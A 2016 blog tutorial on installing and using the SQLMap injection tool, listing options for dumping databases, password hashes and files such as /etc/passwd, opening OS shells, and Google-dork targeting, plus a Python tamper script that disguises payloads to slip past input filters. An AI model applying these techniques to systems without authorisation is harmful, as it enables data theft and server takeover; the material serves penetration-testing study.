Thursday 26 May 2016

Using SQLMap for SQL Injection

Hi,

There are many SQL injection (SQLi) tools to be found on the net, among them SQL Ninja, SQLMap, Pangolin, Havij, Reiluke Tools, schemafuzz.py, etc.
I have tried all the tools mentioned above, and SQLMap is the one I like most. It has many features for SQL injection, such as tamper scripts and payload options. With the various kinds of tamper scripts, we can handle tricky SQLi cases, such as a filter that blocks spaces or particular keywords.
If you are already familiar enough with SQLMap, you can skip this post. Note that SQLMap needs Python 2.6 or 2.7.
1/ Clone SQLMap from GIT repository
$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
[sqlmap-dev] can be replaced with any directory name you want.
2/ Go into SQLMap directory
$ cd sqlmap-dev
Make sqlmap.py executable:
$ chmod +x sqlmap.py
3/ Run SQLMap for the first time
$ ./sqlmap.py
4/ Learn the command-line options provided by SQLMap.
$ ./sqlmap.py --help
The options you will use most often are:

-u URL, --url=URL (target URL)
--random-agent (use a randomly selected HTTP User-Agent header value)
--tamper=TAMPER (apply one or more tamper scripts to the injection payloads, e.g. to get past a WAF or input filter)
--batch (never ask for user input; take the default answer for every prompt)
--no-cast (turn off the payload casting mechanism)
--hex (use DBMS hex functions for data retrieval)
--level=LEVEL (level of tests to perform, range 1-5, default 1)
--risk=RISK (risk of tests to perform, range 1-3, default 1)
--text-only (compare pages based only on their textual content; use it when the page is mostly text, it speeds up the injection process)
--technique=TECH (SQL injection techniques to use, default BEUSTQ: Boolean-based blind, Error-based, Union query, Stacked queries, Time-based blind, inline Queries)
--time-sec=TIMESEC (seconds to delay the DBMS response in time-based blind tests, default 5; raise it if the target is slow to respond)
--dbs (enumerate database names)
--tables (enumerate table names)
--columns (enumerate column names)
--threads=THREADS (number of concurrent HTTP requests, recommended 5, maximum 10)
--dump (dump the entries of a specific table or database)
--dump-all (dump the entries of all databases)
--exclude-sysdbs (exclude system databases when enumerating or dumping, e.g. information_schema and mysql)
--users (enumerate database users)
--passwords (enumerate the password hashes of the database users)
--privileges (enumerate the privileges of each database user; we want to see whether there is a user with full privileges, e.g. the MySQL FILE privilege, which allows reading and writing files on the database server, including the web document root)
--roles (enumerate the roles of each database user)
--file-read=FILE (read a specific file from the database server file system, e.g. /etc/passwd)
--os-shell (prompt for an interactive operating system shell on the target)
--sql-shell (prompt for an interactive SQL shell and run SQL statements directly)
--start=LIMITSTART (first entry to retrieve when dumping)
--stop=LIMITSTOP (last entry to retrieve when dumping)
--count (retrieve the number of entries in the table(s))
-g GOOGLEDORK (process the results of a Google dork as target URLs)
--crawl=DEPTH (crawl the website starting from the target URL, down to the given depth)
--os-pwn (prompt for an out-of-band shell, Meterpreter or VNC; requires Metasploit to be installed)
--forms (parse and test the forms found on the target URL, whether they use GET or POST)
--update (update SQLMap)

The rest of the options you can read up on and learn by yourself.
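As an added example (not from the original post, and not one of SQLMap's shipped scripts), here is a tamper script in the format SQLMap loads with --tamper. It replaces spaces with inline comments and mixes the case of a few keywords, but only outside quoted string literals, so the data values inside the payload are left unchanged. SQLMap ships similar scripts (space2comment, randomcase); the PRIORITY import works when SQLMap loads the file, and the fallback value is an assumption so that the file also runs on its own. The code is written to work on both Python 2 and 3.

```python
# Example SQLMap tamper script (added illustration, not shipped with SQLMap).
# SQLMap loads every file in its tamper/ directory that defines tamper() and
# calls tamper(payload, **kwargs) for each injection payload it sends.

try:
    # Available when the script is loaded by sqlmap itself.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.LOW
except ImportError:
    # Assumed fallback so the file also runs stand-alone, outside sqlmap.
    __priority__ = 0

# Keywords whose case we mix; fixed-case signature filters often match these.
KEYWORDS = ("SELECT", "UNION", "AND", "OR", "FROM", "WHERE")


def dependencies():
    """Called once by sqlmap at load time; used to print requirements or DBMS notes."""
    pass


def _alternate_case(word):
    """'select' -> 'sElEcT' (deterministic, unlike sqlmap's randomcase)."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(word))


def tamper(payload, **kwargs):
    """Replace spaces with /**/ and mix keyword case, only outside of
    single- or double-quoted string literals.

    kwargs carries extra context from sqlmap (e.g. request headers); unused here.
    """
    if not payload:
        return payload

    out = []                 # output pieces
    word = []                # current unquoted alphabetic run
    in_single = in_double = False

    def flush_word():
        # Emit the buffered word, rewriting it if it is one of our keywords.
        if word:
            w = "".join(word)
            if w.upper() in KEYWORDS:
                w = _alternate_case(w)
            out.append(w)
            del word[:]

    for ch in payload:
        # Quote characters toggle literal state (a ' inside "..." is data, and
        # vice versa); the quote itself is copied through unchanged.
        if ch == "'" and not in_double:
            flush_word()
            in_single = not in_single
            out.append(ch)
            continue
        if ch == '"' and not in_single:
            flush_word()
            in_double = not in_double
            out.append(ch)
            continue
        if in_single or in_double:
            out.append(ch)       # inside a literal: never touch data values
            continue
        if ch.isalpha():
            word.append(ch)      # collect a possible keyword
            continue
        flush_word()
        out.append("/**/" if ch == " " else ch)

    flush_word()
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample payload, as sqlmap would pass it in.
    print(tamper("1 UNION ALL SELECT 1,2 FROM users WHERE name='a b'"))
```

Save it under the SQLMap directory as, for example, tamper/spacecase.py and run ./sqlmap.py -u URL --tamper=spacecase; SQLMap reports the loaded tamper script at start-up, and every payload then goes through tamper() before it is sent. Whether a given transformation actually bypasses a filter has to be verified against the target, which is why the script keeps string literals intact: a rewritten value would break the comparison SQLMap relies on to tell true and false responses apart.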
On Windows, just install Python 2.7 and run SQLMap. You can also use Cygwin to get a UNIX-like environment. If you intend to get SQLMap directly from its Git repository, don't forget to install Git for Windows.
The SQLMap project on GitHub can be found here:
https://github.com/sqlmapproject/sqlmap
Next post will be SQLMap in-practice tutorial. Thanks for reading.
